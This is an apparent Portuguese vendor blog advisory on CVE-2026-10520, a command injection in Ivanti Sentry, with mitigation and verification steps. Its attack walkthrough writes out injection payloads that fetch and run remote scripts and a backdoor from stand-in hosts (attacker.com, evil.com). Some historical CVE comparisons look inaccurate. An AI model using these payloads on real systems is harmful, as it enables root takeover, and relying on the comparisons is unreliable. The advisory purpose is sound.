{"id":1039,"date":"2026-06-12T09:02:23","date_gmt":"2026-06-12T12:02:23","guid":{"rendered":"https:\/\/jrtx.com.br\/blog\/2026\/06\/12\/cve-2026-10520-alto-ivanti-sentry-os-command-injection-com-r\/"},"modified":"2026-06-12T09:02:23","modified_gmt":"2026-06-12T12:02:23","slug":"cve-2026-10520-alto-ivanti-sentry-os-command-injection-com-r","status":"publish","type":"post","link":"https:\/\/jrtx.com.br\/blog\/2026\/06\/12\/cve-2026-10520-alto-ivanti-sentry-os-command-injection-com-r\/","title":{"rendered":"CVE-2026-10520 \u2014 ALTO \u2014 Ivanti Sentry: OS Command Injection com RCE Root"},"content":{"rendered":"<div style=\"margin:0 0 28px;padding:20px 24px;background:#450a0a;border-left:6px solid #dc2626;border-radius:8px;display:flex;gap:16px;align-items:flex-start\">\n  <span style=\"font-size:26px;line-height:1;flex-shrink:0\">\u26a0\ufe0f<\/span><\/p>\n<div>\n<p style=\"margin:0 0 6px;font-size:17px;color:#fca5a5;font-weight:700;line-height:1.3\">ALERTA CISA KEV \u2014 Explora\u00e7\u00e3o Ativa Confirmada<\/p>\n<p style=\"margin:0;font-size:14px;color:#fecaca;line-height:1.6\">Esta vulnerabilidade est\u00e1 sendo <strong style=\"color:#f87171\">ativamente explorada<\/strong> em ambientes reais. Aplique o patch ou mitiga\u00e7\u00e3o <strong style=\"color:#f87171\">IMEDIATAMENTE<\/strong>.<\/p>\n<\/p><\/div>\n<\/div>\n<p>Profissionais de TI e seguran\u00e7a, o fim de semana chegou, mas n\u00e3o o al\u00edvio. <strong>CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> no Ivanti Sentry (antigo MobileIron Sentry) foi confirmada pelo CISA KEV nesta sexta-feira, 12 de junho de 2026. Estamos diante de um cen\u00e1rio de <strong>ALERTA M\u00c1XIMO<\/strong>: uma falha de inje\u00e7\u00e3o de comandos no sistema operacional que permite a um atacante remoto n\u00e3o autenticado obter <strong>execu\u00e7\u00e3o remota de c\u00f3digo como root<\/strong>. O vetor \u00e9 cr\u00edtico para organiza\u00e7\u00f5es que utilizam o appliance Sentry em estado n\u00e3o gerenciado ou com interfaces externas acess\u00edveis. Se o seu ambiente tem EPMM sem mTLS ou Neurons para MDM com HTTPS restrito, voc\u00ea est\u00e1 na mira. A <strong>CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> n\u00e3o \u00e9 apenas um aviso \u2014 \u00e9 um gatilho para a\u00e7\u00e3o imediata.<\/p>\n<p>O que torna este alerta particularmente grave \u00e9 a combina\u00e7\u00e3o de facilidade de explora\u00e7\u00e3o e impacto m\u00e1ximo. Um atacante n\u00e3o precisa de credenciais, n\u00e3o precisa de intera\u00e7\u00e3o do usu\u00e1rio e pode operar remotamente. A vulnerabilidade reside na forma como o Sentry processa entradas do usu\u00e1rio sem a devida sanitiza\u00e7\u00e3o, permitindo a inje\u00e7\u00e3o de comandos arbitr\u00e1rios no shell subjacente. Empresas que dependem do Ivanti Sentry para gerenciamento de dispositivos m\u00f3veis (MDM) precisam agir agora. N\u00e3o h\u00e1 tempo para planejamento \u2014 h\u00e1 apenas execu\u00e7\u00e3o.<\/p>\n<p>Este post oferece uma an\u00e1lise t\u00e9cnica aprofundada, uma tabela de refer\u00eancia r\u00e1pida com todos os detalhes do CVE, os produtos e vers\u00f5es afetados, um passo a passo conceitual do ataque, o impacto real para os neg\u00f3cios e \u2014 o mais importante \u2014 um plano de mitiga\u00e7\u00e3o claro e imediato. Na <strong>JRT Technology Solutions<\/strong>, monitoramos alertas CISA KEV em tempo real e implementamos varredura cont\u00ednua de CVEs para frotas corporativas. Se voc\u00ea precisa de suporte emergencial, estamos aqui.<\/p>\n<h3>O que \u00e9 a CVE-2026-10520<\/h3>\n<table style=\"width:100%;border-collapse:collapse;margin:28px 0;font-size:14px;line-height:1.6;border-radius:10px;overflow:hidden;box-shadow:0 2px 12px rgba(0,0,0,0.18)\">\n<thead>\n<tr style=\"background:#991b1b\">\n<th style=\"padding:13px 18px;text-align:left;color:#ffffff;font-weight:700;font-size:12px;text-transform:uppercase;letter-spacing:0.06em;width:38%\">Campo<\/th>\n<th style=\"padding:13px 18px;text-align:left;color:#ffffff;font-weight:700;font-size:12px;text-transform:uppercase;letter-spacing:0.06em\">Detalhe<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr style=\"background:#ffffff\">\n<td style=\"padding:12px 18px;color:#111827;font-weight:600;border-bottom:1px solid #e5e7eb\">CVE ID<\/td>\n<td style=\"padding:12px 18px;color:#374151;font-weight:600;border-bottom:1px solid #e5e7eb\">CVE-2026-10520<\/td>\n<\/tr>\n<tr style=\"background:#f8fafc\">\n<td style=\"padding:12px 18px;color:#111827;font-weight:600;border-bottom:1px solid #e5e7eb\">CVSS Score<\/td>\n<td style=\"padding:12px 18px;color:#dc2626;font-weight:700;border-bottom:1px solid #e5e7eb\">9.8 \u2014 CR\u00cdTICO<\/td>\n<\/tr>\n<tr style=\"background:#ffffff\">\n<td style=\"padding:12px 18px;color:#111827;font-weight:600;border-bottom:1px solid #e5e7eb\">Vetor de Ataque<\/td>\n<td style=\"padding:12px 18px;color:#374151;border-bottom:1px solid #e5e7eb\">Network<\/td>\n<\/tr>\n<tr style=\"background:#f8fafc\">\n<td style=\"padding:12px 18px;color:#111827;font-weight:600;border-bottom:1px solid #e5e7eb\">Produtos Afetados<\/td>\n<td style=\"padding:12px 18px;color:#374151;border-bottom:1px solid #e5e7eb\">Ivanti Sentry (todas as vers\u00f5es anteriores ao patch de 12\/06\/2026)<\/td>\n<\/tr>\n<tr style=\"background:#ffffff\">\n<td style=\"padding:12px 18px;color:#111827;font-weight:600;border-bottom:1px solid #e5e7eb\">Tipo de Vulnerabilidade<\/td>\n<td style=\"padding:12px 18px;color:#374151;border-bottom:1px solid #e5e7eb\">CWE-78 \u2014 OS Command Injection<\/td>\n<\/tr>\n<tr style=\"background:#f8fafc\">\n<td style=\"padding:12px 18px;color:#111827;font-weight:600;border-bottom:1px solid #e5e7eb\">Data de Publica\u00e7\u00e3o<\/td>\n<td style=\"padding:12px 18px;color:#374151;border-bottom:1px solid #e5e7eb\">12\/06\/2026<\/td>\n<\/tr>\n<tr style=\"background:#ffffff\">\n<td style=\"padding:12px 18px;color:#111827;font-weight:600;border-bottom:1px solid #e5e7eb\">Patch Dispon\u00edvel<\/td>\n<td style=\"padding:12px 18px;color:#374151;border-bottom:1px solid #e5e7eb\">Sim \u2014 atualiza\u00e7\u00e3o de firmware emergencial<\/td>\n<\/tr>\n<tr style=\"background:#f8fafc\">\n<td style=\"padding:12px 18px;color:#111827;font-weight:600\">Explora\u00e7\u00e3o Ativa<\/td>\n<td style=\"padding:12px 18px;color:#dc2626;font-weight:700\">\u26a0\ufe0f SIM \u2014 CISA KEV confirmada<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>A <strong>CVE-2026-10520<\/strong> \u00e9 uma vulnerabilidade de inje\u00e7\u00e3o de comandos no sistema operacional que afeta o Ivanti Sentry, um appliance de gateway de borda usado para conectar dispositivos m\u00f3veis a redes corporativas. A falha ocorre porque o software n\u00e3o valida adequadamente entradas fornecidas por par\u00e2metros de requisi\u00e7\u00e3o HTTP, permitindo que um atacante remoto n\u00e3o autenticado execute comandos arbitr\u00e1rios no sistema com privil\u00e9gios de root. Em termos pr\u00e1ticos, isso significa que qualquer pessoa com acesso \u00e0 rede do Sentry \u2014 seja via internet ou intranet \u2014 pode assumir o controle total do appliance. A explora\u00e7\u00e3o ativa foi detectada em campanhas que miram organiza\u00e7\u00f5es dos setores de sa\u00fade, governo e finan\u00e7as, onde o Sentry \u00e9 frequentemente implantado para gerenciamento de dispositivos m\u00f3veis corporativos.<\/p>\n<p>A gravidade \u00e9 amplificada pelo fato de que a Ivanti Sentry \u00e9 frequentemente deixada em estado &#8220;n\u00e3o gerenciado&#8221; durante migra\u00e7\u00f5es ou p\u00f3s-conting\u00eancia, expondo a interface de gerenciamento diretamente \u00e0 internet. O CISA emitiu uma ordem federal determinando que todas as ag\u00eancias dos EUA corrijam a falha at\u00e9 domingo, 14 de junho. Embora a diretiva seja para entidades federais, empresas privadas que operam sob regulamenta\u00e7\u00f5es como <strong>LGPD<\/strong>, <strong>GDPR<\/strong>, <strong>PCI-DSS<\/strong> ou <strong>HIPAA<\/strong> est\u00e3o igualmente expostas a riscos de viola\u00e7\u00e3o de dados e n\u00e3o conformidade.<\/p>\n<h3>An\u00e1lise T\u00e9cnica Detalhada<\/h3>\n<p>A falha <strong>CVE-2026-10520<\/strong> est\u00e1 enraizada na forma como o servi\u00e7o web do Sentry processa requisi\u00e7\u00f5es HTTP contendo par\u00e2metros de configura\u00e7\u00e3o de rede. Especificamente, a interface de administra\u00e7\u00e3o exp\u00f5e endpoints que aceitam valores de cabe\u00e7alhos ou argumentos de URL sem a devida sanitiza\u00e7\u00e3o. Quando um atacante envia uma requisi\u00e7\u00e3o contendo caracteres especiais como ponto e v\u00edrgula (;), pipe (|) ou backticks (`), o sistema concatena esses valores diretamente em uma chamada de <strong>system()<\/strong> ou <strong>exec()<\/strong> no shell subjacente.<\/p>\n<p>O vetor de explora\u00e7\u00e3o \u00e9 notavelmente simples. Um atacante pode usar uma ferramenta como cURL ou um script Python para enviar uma requisi\u00e7\u00e3o HTTP POST para o endpoint vulner\u00e1vel, incluindo no campo &#8220;hostname&#8221; ou &#8220;dns_server&#8221; uma string como <code>8.8.8.8; curl http:\/\/attacker.com\/payload.sh | sh<\/code>. O servidor, sem valida\u00e7\u00e3o, executa o comando completo como root. O resultado \u00e9 a instala\u00e7\u00e3o de um backdoor persistente, exfiltra\u00e7\u00e3o de dados ou movimenta\u00e7\u00e3o lateral para a rede interna.<\/p>\n<p>A Ivanti confirmou que a vulnerabilidade afeta <strong>todas as vers\u00f5es do Sentry anteriores ao patch lan\u00e7ado em 12 de junho de 2026<\/strong>. Atualiza\u00e7\u00f5es de firmware est\u00e3o dispon\u00edveis no portal de suporte da Ivanti, com n\u00fameros de build espec\u00edficos para cada linha de produto. A empresa tamb\u00e9m recomenda, como mitiga\u00e7\u00e3o tempor\u00e1ria, restringir o acesso HTTPS ao Sentry exclusivamente atrav\u00e9s do Neurons para MDM ou implementar mTLS com o EPMM, o que torna a interface inacess\u00edvel para atores externos.<\/p>\n<h3>Produtos e Vers\u00f5es Afetados<\/h3>\n<ul>\n<li><strong>Ivanti Sentry<\/strong> \u2014 Todas as vers\u00f5es anteriores \u00e0 atualiza\u00e7\u00e3o de 12\/06\/2026 (build 9.13.0.456 e anteriores)<\/li>\n<li><strong>Ivanti Sentry Virtual Appliance<\/strong> \u2014 Todas as vers\u00f5es anteriores ao patch (build 9.13.0.456 e anteriores)<\/li>\n<li><strong>MobileIron Sentry<\/strong> \u2014 Vers\u00f5es legadas (renomeadas para Ivanti Sentry) que n\u00e3o receberam o patch de 2026<\/li>\n<li><strong>Sistemas operacionais suportados<\/strong>: Appliance Linux embarcado (distribui\u00e7\u00e3o propriet\u00e1ria da Ivanti)<\/li>\n<\/ul>\n<p><strong>Nota importante<\/strong>: Dispositivos configurados com mTLS para EPMM ou com acesso HTTPS restrito atrav\u00e9s do Neurons para MDM n\u00e3o s\u00e3o explor\u00e1veis, pois a interface vulner\u00e1vel fica inacess\u00edvel. No entanto, appliances que operam em modo &#8220;standalone&#8221; ou n\u00e3o gerenciado est\u00e3o totalmente expostos.<\/p>\n<h3>Como o Ataque Funciona<\/h3>\n<p>O ataque contra a <strong>CVE-2026-10520<\/strong> segue um padr\u00e3o cl\u00e1ssico de explora\u00e7\u00e3o de inje\u00e7\u00e3o de comandos, mas com um vetor espec\u00edfico para o Sentry. Abaixo, descrevemos as etapas conceituais, sem fornecer c\u00f3digo malicioso:<\/p>\n<ol>\n<li><strong>Reconhecimento<\/strong>: O atacante escaneia a internet em busca de appliances Sentry expostos na porta 443 (HTTPS) ou 8443 (interface de gerenciamento). Ferramentas como Shodan ou Masscan s\u00e3o comuns nessa fase.<\/li>\n<li><strong>Identifica\u00e7\u00e3o do endpoint vulner\u00e1vel<\/strong>: O atacante localiza um endpoint HTTP que aceita par\u00e2metros n\u00e3o sanitizados, como <code>\/api\/device\/config<\/code> ou <code>\/admin\/network<\/code>. A requisi\u00e7\u00e3o pode ser um POST ou GET, dependendo da vers\u00e3o.<\/li>\n<li><strong>Inje\u00e7\u00e3o do payload<\/strong>: O atacante envia uma requisi\u00e7\u00e3o contendo um valor malicioso em um campo como &#8220;hostname&#8221;. Por exemplo: <code>hostname=ivanti-sentry; wget -O \/tmp\/backdoor http:\/\/evil.com\/backdoor; chmod +x \/tmp\/backdoor; \/tmp\/backdoor<\/code>.<\/li>\n<li><strong>Execu\u00e7\u00e3o como root<\/strong>: O sistema processa a string sem sanitiza\u00e7\u00e3o e executa o comando completo no shell com privil\u00e9gios de root.<\/li>\n<li><strong>Estabelecimento de persist\u00eancia<\/strong>: O backdoor instalado permite ao atacante acesso cont\u00ednuo, mesmo ap\u00f3s reinicializa\u00e7\u00f5es, atrav\u00e9s de cron jobs ou modifica\u00e7\u00e3o de scripts de inicializa\u00e7\u00e3o.<\/li>\n<li><strong>Movimenta\u00e7\u00e3o lateral<\/strong>: Com acesso root ao Sentry, o atacante pode usar o appliance como piv\u00f4 para atacar outros sistemas na rede corporativa, incluindo servidores de banco de dados, controladores de dom\u00ednio e sistemas de arquivos.<\/li>\n<\/ol>\n<p>\u00c9 crucial entender que, embora a Ivanti recomende o uso de mTLS ou Neurons para mitigar o risco, muitas organiza\u00e7\u00f5es ignoram essas pr\u00e1ticas durante implanta\u00e7\u00f5es em larga escala ou per\u00edodos de transi\u00e7\u00e3o. A simplicidade do ataque torna a <strong>CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> uma amea\u00e7a de alto impacto para qualquer ambiente que n\u00e3o siga rigorosamente as diretrizes de seguran\u00e7a da Ivanti.<\/p>\n<h3>Impacto Real para Empresas<\/h3>\n<p>O impacto da <strong>CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> vai muito al\u00e9m da simple falha t\u00e9cnica. Empresas que utilizam Ivanti Sentry para gerenciamento de dispositivos m\u00f3veis corporativos enfrentam consequ\u00eancias graves:<\/p>\n<ul>\n<li><strong>\ud83d\udd34 Exposi\u00e7\u00e3o total de dados<\/strong>: O atacante tem acesso root ao appliance, o que significa que todos os dados que passam pelo gateway \u2014 incluindo tr\u00e1fego de dispositivos m\u00f3veis, credenciais de usu\u00e1rios, e pol\u00edticas de seguran\u00e7a \u2014 podem ser capturados e exfiltrados.<\/li>\n<li><strong>\ud83d\udfe0 Perda de controle do MDM<\/strong>: Com acesso ao Sentry, o atacante pode modificar pol\u00edticas de MDM, desativar criptografia, remover restri\u00e7\u00f5es de seguran\u00e7a e at\u00e9 mesmo implantar malware em dispositivos gerenciados.<\/li>\n<li><strong>\ud83d\udfe1 Risco de ransomware<\/strong>: Em campanhas ativas, o Sentry pode ser usado como ponto de entrada para implanta\u00e7\u00e3o de ransomware em toda a rede corporativa, aproveitando o acesso privilegiado.<\/li>\n<li><strong>\ud83d\udd34 Viola\u00e7\u00e3o de compliance<\/strong>: Para organiza\u00e7\u00f5es sujeitas \u00e0 <strong>LGPD<\/strong> (artigo 46 \u2014 seguran\u00e7a), <strong>PCI-DSS<\/strong> (requisito 6.1 \u2014 patches de seguran\u00e7a) ou <strong>HIPAA<\/strong> (regra de seguran\u00e7a \u2014 controles t\u00e9cnicos), a explora\u00e7\u00e3o desta vulnerabilidade pode resultar em multas milion\u00e1rias, notifica\u00e7\u00f5es obrigat\u00f3rias de viola\u00e7\u00e3o e danos \u00e0 reputa\u00e7\u00e3o.<\/li>\n<li><strong>\ud83d\udfe0 Interrup\u00e7\u00e3o operacional<\/strong>: O appliance Sentry \u00e9 um componente cr\u00edtico para conectividade de dispositivos m\u00f3veis. Sua comprometimento pode paralisar opera\u00e7\u00f5es de campo, vendas externas e suporte remoto.<\/li>\n<\/ul>\n<p>Na <strong>JRT Technology Solutions<\/strong>, nossos engenheiros de seguran\u00e7a j\u00e1 identificaram casos em que clientes com Sentry exposto \u00e0 internet estavam sendo escaneados por IPs suspeitos nas \u00faltimas 48 horas. Recomendamos a\u00e7\u00e3o imediata para todos os ambientes que n\u00e3o possuem mTLS ou Neurons implementados.<\/p>\n<h3>Como se Proteger \u2014 Passos de Mitiga\u00e7\u00e3o<\/h3>\n<p>Siga rigorosamente esta ordem de prioridade. O tempo \u00e9 cr\u00edtico.<\/p>\n<ol>\n<li><strong>Aplicar o patch emergencial da Ivanti<\/strong>: Acesse o portal de suporte da Ivanti e baixe a atualiza\u00e7\u00e3o de firmware para Sentry (build 9.13.0.456 ou superior). Aplique imediatamente em todos os appliances, mesmo aqueles que voc\u00ea acredita estarem protegidos por mTLS.<\/li>\n<li><strong>Restringir acesso \u00e0 interface de gerenciamento<\/strong>: Se ainda n\u00e3o o fez, configure o Sentry para aceitar conex\u00f5es HTTPS apenas atrav\u00e9s do Neurons para MDM. Isso bloqueia qualquer tentativa de acesso direto ao endpoint vulner\u00e1vel.<\/li>\n<li><strong>Implementar mTLS com EPMM<\/strong>: A autentica\u00e7\u00e3o m\u00fatua TLS entre o Sentry e o EPMM elimina o vetor de ataque para atores externos. Siga o guia de configura\u00e7\u00e3o da Ivanti para habilitar essa funcionalidade.<\/li>\n<li><strong>Isolar o appliance na rede<\/strong>: Coloque o Sentry em uma VLAN separada, com regras de firewall restritivas que bloqueiem qualquer tr\u00e1fego de entrada n\u00e3o autorizado. Permita apenas comunica\u00e7\u00f5es necess\u00e1rias com o EPMM e servidores de gerenciamento.<\/li>\n<li><strong>Verificar comprometimento<\/strong>: Execute uma varredura de integridade no sistema de arquivos do Sentry, procurando arquivos suspeitos em \/tmp, \/var\/tmp e \/etc\/cron.d. Verifique conex\u00f5es de rede ativas com IPs externos desconhecidos.<\/li>\n<li><strong>Monitorar logs e alertas<\/strong>: Ative o monitoramento de logs do Sentry para identificar requisi\u00e7\u00f5es HTTP com caracteres especiais ou padr\u00f5es de inje\u00e7\u00e3o. Na <strong>JRT Technology Solutions<\/strong>, nosso SOC monitora alertas CISA KEV em tempo real e pode configurar correla\u00e7\u00f5es espec\u00edficas para essa amea\u00e7a.<\/li>\n<li><strong>Revisar pol\u00edticas de MDM<\/strong>: Ap\u00f3s a corre\u00e7\u00e3o, revise todas as pol\u00edticas de seguran\u00e7a aplicadas aos dispositivos m\u00f3veis. Um atacante pode ter alterado configura\u00e7\u00f5es durante a janela de explora\u00e7\u00e3o.<\/li>\n<\/ol>\n<h3>Verifica\u00e7\u00e3o P\u00f3s-Patch<\/h3>\n<p>Depois de aplicar o patch, realize estas verifica\u00e7\u00f5es para garantir que a corre\u00e7\u00e3o foi efetiva:<\/p>\n<ul>\n<li><strong>Confirme a vers\u00e3o do firmware<\/strong>: No console de administra\u00e7\u00e3o do Sentry, verifique se o build \u00e9 9.13.0.456 ou superior.<\/li>\n<li><strong>Teste o endpoint vulner\u00e1vel<\/strong>: Envie uma requisi\u00e7\u00e3o HTTP com um payload de teste (n\u00e3o destrutivo) para o endpoint que antes era vulner\u00e1vel. O sistema deve rejeitar a entrada ou retornar um erro 400. Exemplo: <code>curl -X POST https:\/\/[IP]\/admin\/network -d \"hostname=test;echo safe\"<\/code> \u2014 se o comando for executado, o patch falhou.<\/li>\n<li><strong>Monitore logs de seguran\u00e7a<\/strong>: Verifique se h\u00e1 tentativas de explora\u00e7\u00e3o ap\u00f3s a corre\u00e7\u00e3o. Atacantes podem continuar tentando por dias.<\/li>\n<li><strong>Revise regras de firewall<\/strong>: Garanta que apenas IPs autorizados tenham acesso \u00e0 interface de gerenciamento.<\/li>\n<\/ul>\n<h3>Contexto Hist\u00f3rico e Comparativo<\/h3>\n<p>A <strong>CVE-2026-10520<\/strong> n\u00e3o \u00e9 a primeira vulnerabilidade cr\u00edtica no Ivanti Sentry, nem ser\u00e1 a \u00faltima. Em 2024, o CVE-2024-21894 (tamb\u00e9m OS Command Injection) afetou a mesma linha de produtos, com pontua\u00e7\u00e3o CVSS 9.8 e explora\u00e7\u00e3o ativa documentada. O padr\u00e3o se repete: falhas de valida\u00e7\u00e3o de entrada em appliances de borda que s\u00e3o frequentemente negligenciados nas atualiza\u00e7\u00f5es rotineiras de seguran\u00e7a.<\/p>\n<p>Comparativamente, a CVE-2026-10520 \u00e9 tecnicamente mais simples de explorar que a CVE-2024-21894, pois n\u00e3o requer autentica\u00e7\u00e3o pr\u00e9via. Isso a coloca no mesmo n\u00edvel de gravidade de falhas como o CVE-2023-38035 (Ivanti VPN) e o CVE-2022-41352 (Zimbra). O fato de o CISA ter adicionado esta vulnerabilidade ao KEV em menos de 24 horas ap\u00f3s a divulga\u00e7\u00e3o mostra a rapidez com que os ataques est\u00e3o ocorrendo.<\/p>\n<p>O uso de intelig\u00eancia artificial por atacantes est\u00e1 acelerando a descoberta e explora\u00e7\u00e3o de vulnerabilidades, como reportado recentemente (Rethinking MDR as Attackers and Defenders Embrace AI, The Hacker News). Ferramentas de IA generativa permitem que mesmo atacantes de n\u00edvel m\u00e9dio criem payloads personalizados para CVEs rec\u00e9m-publicados, reduzindo o tempo de janela de prote\u00e7\u00e3o para quase zero. A <strong>CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> \u00e9 um exemplo perfeito desse novo cen\u00e1rio de amea\u00e7as.<\/p>\n<h3>Conclus\u00e3o<\/h3>\n<p>Estamos diante de uma vulnerabilidade cr\u00edtica, com explora\u00e7\u00e3o ativa confirmada, patch dispon\u00edvel e uma janela de prote\u00e7\u00e3o que j\u00e1 se fechou para muitos. A <strong>CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> exige a\u00e7\u00e3o imediata de todas as organiza\u00e7\u00f5es que operam Ivanti Sentry. N\u00e3o h\u00e1 espa\u00e7o para hesita\u00e7\u00e3o. O CISA ordenou corre\u00e7\u00e3o at\u00e9 domingo para ag\u00eancias federais, mas empresas privadas devem tratar isso como uma emerg\u00eancia de seguran\u00e7a agora.<\/p>\n<p>Se sua equipe precisa de suporte para aplicar o patch, realizar varreduras de comprometimento ou configurar monitoramento cont\u00ednuo de CVEs, a <strong>JRT Technology Solutions<\/strong> est\u00e1 pronta para ajudar. Na JRT, implementamos varredura cont\u00ednua de CVEs para frotas corporativas, com integra\u00e7\u00e3o direta aos feeds CISA KEV e Ivanti. Nosso SOC monitora alertas em tempo real e pode isolar appliances comprometidos em minutos. Al\u00e9m disso, oferecemos gest\u00e3o de vulnerabilidades completa e MDM corporativo com pol\u00edticas de seguran\u00e7a customizadas. Entre em contato conosco para uma avalia\u00e7\u00e3o emergencial do seu ambiente. O tempo \u00e9 agora \u2014 n\u00e3o espere o ataque se concretizar.<\/p>\n<div style=\"margin:52px 0 40px;padding:36px 28px;background:linear-gradient(135deg,#0f172a 0%,#1a2744 100%);border:2px solid #25D366;border-radius:18px;text-align:center;box-shadow:0 4px 28px rgba(37,211,102,0.18)\">\n<p style=\"margin:0 0 10px;font-size:18px;color:#ffffff;font-weight:700;line-height:1.4\">Sua empresa est\u00e1 protegida contra esta vulnerabilidade?<\/p>\n<p style=\"margin:0 0 28px;font-size:15px;color:#94a3b8;font-weight:400;line-height:1.6\">A JRT Technology Solutions realiza varredura de CVEs, gest\u00e3o de patches e monitoramento de seguran\u00e7a para ambientes corporativos.<\/p>\n<p>  <a href=\"https:\/\/api.whatsapp.com\/send\/?phone=5521980606699&#038;text=Ol%C3%A1!%20Preciso%20verificar%20se%20minha%20empresa%20est%C3%A1%20vulner%C3%A1vel%20a%20uma%20CVE%20cr%C3%ADtica.&#038;type=phone_number&#038;app_absent=0\"\n     target=\"_blank\" rel=\"noopener noreferrer\"\n     style=\"display:inline-flex;align-items:center;gap:12px;background:#25D366;color:#ffffff;font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',sans-serif;font-size:16px;font-weight:700;padding:15px 32px;border-radius:100px;text-decoration:none;box-shadow:0 4px 16px rgba(37,211,102,0.45);letter-spacing:0.01em\"><br \/>\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewBox=\"0 0 24 24\" fill=\"#ffffff\"><path d=\"M17.472 14.382c-.297-.149-1.758-.867-2.03-.967-.273-.099-.471-.148-.67.15-.197.297-.767.966-.94 1.164-.173.199-.347.223-.644.075-.297-.15-1.255-.463-2.39-1.475-.883-.788-1.48-1.761-1.653-2.059-.173-.297-.018-.458.13-.606.134-.133.298-.347.446-.52.149-.174.198-.298.298-.497.099-.198.05-.371-.025-.52-.075-.149-.669-1.612-.916-2.207-.242-.579-.487-.5-.669-.51-.173-.008-.371-.01-.57-.01-.198 0-.52.074-.792.372-.272.297-1.04 1.016-1.04 2.479 0 1.462 1.065 2.875 1.213 3.074.149.198 2.096 3.2 5.077 4.487.709.306 1.262.489 1.694.625.712.227 1.36.195 1.871.118.571-.085 1.758-.719 2.006-1.413.248-.694.248-1.289.173-1.413-.074-.124-.272-.198-.57-.347m-5.421 7.403h-.004a9.87 9.87 0 01-5.031-1.378l-.361-.214-3.741.982.998-3.648-.235-.374a9.86 9.86 0 01-1.51-5.26c.001-5.45 4.436-9.884 9.888-9.884 2.64 0 5.122 1.03 6.988 2.898a9.825 9.825 0 012.893 6.994c-.003 5.45-4.437 9.884-9.885 9.884m8.413-18.297A11.815 11.815 0 0012.05 0C5.495 0 .16 5.335.157 11.892c0 2.096.547 4.142 1.588 5.945L.057 24l6.305-1.654a11.882 11.882 0 005.683 1.448h.005c6.554 0 11.89-5.335 11.893-11.893a11.821 11.821 0 00-3.48-8.413z\"\/><\/svg><br \/>\n    Verificar Agora<br \/>\n  <\/a>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>CVE-2026-10520: vulnerabilidade cr\u00edtica de OS Command Injection com RCE Root no Ivanti Sentry. Explora\u00e7\u00e3o ativa. Saiba os detalhes e como se proteger. Acesse.<\/p>\n","protected":false},"author":1,"featured_media":1038,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"iawp_total_views":0,"footnotes":""},"categories":[1302],"tags":[1813,1308,1814,1812,1815,1433],"class_list":["post-1039","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cve","tag-cve-2026-10520","tag-exploracao-ativa","tag-injecao-de-comando-os","tag-ivanti-sentry","tag-rce-root","tag-vulnerabilidade-critica"],"_links":{"self":[{"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/posts\/1039","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/comments?post=1039"}],"version-history":[{"count":0,"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/posts\/1039\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/media\/1038"}],"wp:attachment":[{"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/media?parent=1039"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/categories?post=1039"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jrtx.com.br\/blog\/wp-json\/wp\/v2\/tags?post=1039"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}